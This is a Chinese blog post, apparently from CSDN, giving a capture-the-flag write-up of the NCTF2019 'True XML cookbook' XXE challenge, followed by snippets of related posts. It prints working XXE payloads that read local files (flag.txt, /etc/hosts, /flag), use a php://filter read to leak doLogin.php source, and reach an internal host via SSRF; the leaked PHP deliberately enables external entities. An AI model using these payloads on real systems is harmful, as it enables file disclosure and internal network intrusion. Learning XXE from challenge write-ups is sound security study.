2020/7/07 - [NCTF2019]True XML cookbook - xxe

最新推荐文章于 2024-05-10 12:02:09 发布
最新推荐文章于 2024-05-10 12:02:09 发布
阅读量686 收藏 2
点赞数
文章标签: xml web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangxiansheng12/article/details/107194657
版权

我准备发两份,一份发到这里,另一份发到CSDN上面,这里的内容浏览器不好搜到,别人看不到,无趣

第二道xxe类型的题了。Content-Type: application/xml;charset=utf-8看看这熟悉的内容,好吧,第一道payload为

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
 <!ENTITY xxe SYSTEM "./flag.txt">
 ]>
<user><username>&xxe;</username><password>&xxe;</password></user>

根据响应报错,判断关键文件为doLogin.php文件,用php伪协议读一下,第二道payload与base64解码后的doLogin.php文件分别为:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
 <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=./doLogin.php">
 ]>
<user><username>&xxe;</username><password>&xxe;</password></user>

<?php
/**
* autor: c0ny1
* date: 2018-2-7
*/

$USERNAME = 'admin'; //账号
$PASSWORD = '024b87931a03f738fff6693ce0a78c88'; //密码
$result = null;

libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');

try{
	$dom = new DOMDocument();
	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
	$creds = simplexml_import_dom($dom);

	$username = $creds->username;
	$password = $creds->password;

	if($username == $USERNAME && $password == $PASSWORD){
		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
	}else{
		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
	}	
}catch(Exception $e){
	$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}

header('Content-Type: text/html; charset=utf-8');
echo $result;
?>

没啥用,原来xxe利用的方式还有许多,比如下面就要用到的,访问内网中的主机,先使用file读取etc/hosts的内容,这payload为

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
 <!ENTITY xxe SYSTEM "file:///etc/hosts">
 ]>
<user><username>&xxe;</username><password>&xxe;</password></user>

响应内容为

127.0.0.1	localhost
::1	localhost ip6-localhost ip6-loopback
fe00::0	ip6-localnet
ff00::0	ip6-mcastprefix
ff02::1	ip6-allnodes
ff02::2	ip6-allrouters
173.122.253.10	osrc

看起来就像是win里面的hosts一样,应该是为了相同的目的。

读flag

payload为

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
 <!ENTITY xxe SYSTEM "http://173.122.253.11">
 ]>
<user><username>&xxe;</username><password>&xxe;</password></user>

这里flag就在http://173.122.253.11 的下一个,可以,获得了flag。

抒情诗、
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
[NCTF2019]True XML cookbook
missht0的博客
01-30 390
[NCTF2019]True XML cookbook 抓包,发现存在XXE漏洞 添加外部注入实体 <?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE hack [ <!ENTITY file SYSTEM "file:///flag"> ]> <user> <username>&admin;</username> <password>password<
[NCTF2019]True XML cookbook 1(XML)
weixin_45577185的博客
10-20 329
总结一下知识点: 抓包,插入恶意XML外部实体 /etc/hosts 储存域名解析的缓存 /etc/passwd 用户密码 /proc/net/arp 每个网络接口的arp表中dev包 直接用下面的代码读取flag会报错 <?xml version="1.0" ?> <!DOCTYPE note [ <!ENTITY M1kael SYSTEM "file:///flag"> ]> <user> <username>&M1kael;&lt
xml-xxe漏洞之Fake XML cookbook
qq_58970968的博客
07-21 266
有的小伙伴可能已经发现了,例1中实体名前面并没有%,而例2中实体名前是有%的,这里的区别在于,例1中定义的实体是通用实体,而例2中定义的是参数实体,并且参数实体只能在dtd中使用,即例2代码中的第三行%d;,这里就像在外面引用统用实体一样,这里的%d;就引用了http//xxx.com/xxe.dtd这个文件到dtd中。当应用是通过用户上传的XML文件或POST请求进行数据的传输,并且应用没有禁止XML引用外部实体,也没有过滤用户提交的XML数据,那么就会产生XML外部实体注入漏洞,即XXE漏洞。...
xxe学习之hetianlab-simplexxe及buuctf-fake xml cookbook
m0_62008601的博客
04-22 329
目录 定义 xml的基本格式和语法 合天网安实验室-simplexxe buuctf-fake cookbook 首先,我们先来初步了解一下什么是xxe 1、定义 XXE(XMLExternalEntityInjection)全称为XML外部实体注入,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。而学习XXE要从认识XM...
5月10日学习记录
weixin_74020633的博客
05-10 727
这题是关于xxe漏洞的实际应用,利用xxe漏洞的外部实体来进行ssrf探针内网的主机和[NCTF2019]Fake XML cookbook的区别就在于xxe漏洞的利用方向,一个是命令执行,一个是SSRF看题,打开环境,熟悉的登录框正常的抓包进行分析,明显的xxe漏洞开始构造,先查看xxe漏洞能不能正常利用存在xxe漏洞并且能够正常利用,我在做题时想的是直接查看flag文件报错了,说明flag这个文件不存在,也许我们在外网不能正常访问,xxe的漏洞利用就可以探针内网,尝试访问内网看看。
XXE漏洞】buu_[NCTF2019]Fake XML cookbook
serendipity1130的博客
09-11 312
[NCTF2019]Fake XML cookbook XXE漏洞 学习文章:XXE漏洞学习和利用—[NCTF2019]Fake XML cookbook-布布扣-bubuko.com XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。 XXE漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 1.抓包发现里面存在一个X
[NCTF2019]True XML cookbook --不会编程的崽
不会编程的崽的博客
02-21 930
xxe ssrf 配合
[NCTF 2019]True XML cookbook
m0_70819573的博客
04-21 368
不能直接在根目录读取flag,但可以通过/etc/hosts获取内网。再通过扫描c段获得flag。
超微X11SPH-NCTPF主板用户手册
04-01
超微X11SPH-NCTPF主板用户手册
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
最新发布
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
harmonyos2-Inn0vHackti0n.github.io:Inn0vHackti0nCTF团队网站
07-01
和声2 和谐 Harmony 是一个响应式 jekyll 主题。 为 jekyll 2.x 构建 支持 Google 分析和 RSS 提要 基于 Sass ...是一个静态站点生成器,一个开源工具,用于创建各种形状和大小的简单而强大的网站。...j
i5处理器移动芯片组HM55主板图纸GE5-v01.pdf
12-28
4. **PCH** 相关页:PCH是主板上的核心组件,负责管理I/O设备,如PCI-E、USB、SATA、HDMI等,其中LVDS/DDI、PCI/USB/NVRAM、GPIO/NCTF/RSVD等页面描述了PCH与这些设备的接口。 5. **Thermal/Fan Control**:散热...
[NCTF2019]True XML cookbook 1
qq_53460654的博客
05-30 711
之前写了个fake 这次又来个ture 打开环境 明确是xxe 直接抓包 回显位还是1 试试直接读flag <?xml version="1.0" ?> <!DOCTYPE note [ <!ENTITY M1kael SYSTEM "file:///flag"> ]> <user> <username>&M1kael;</username> <password>123456</password> &
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

抒情诗、

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值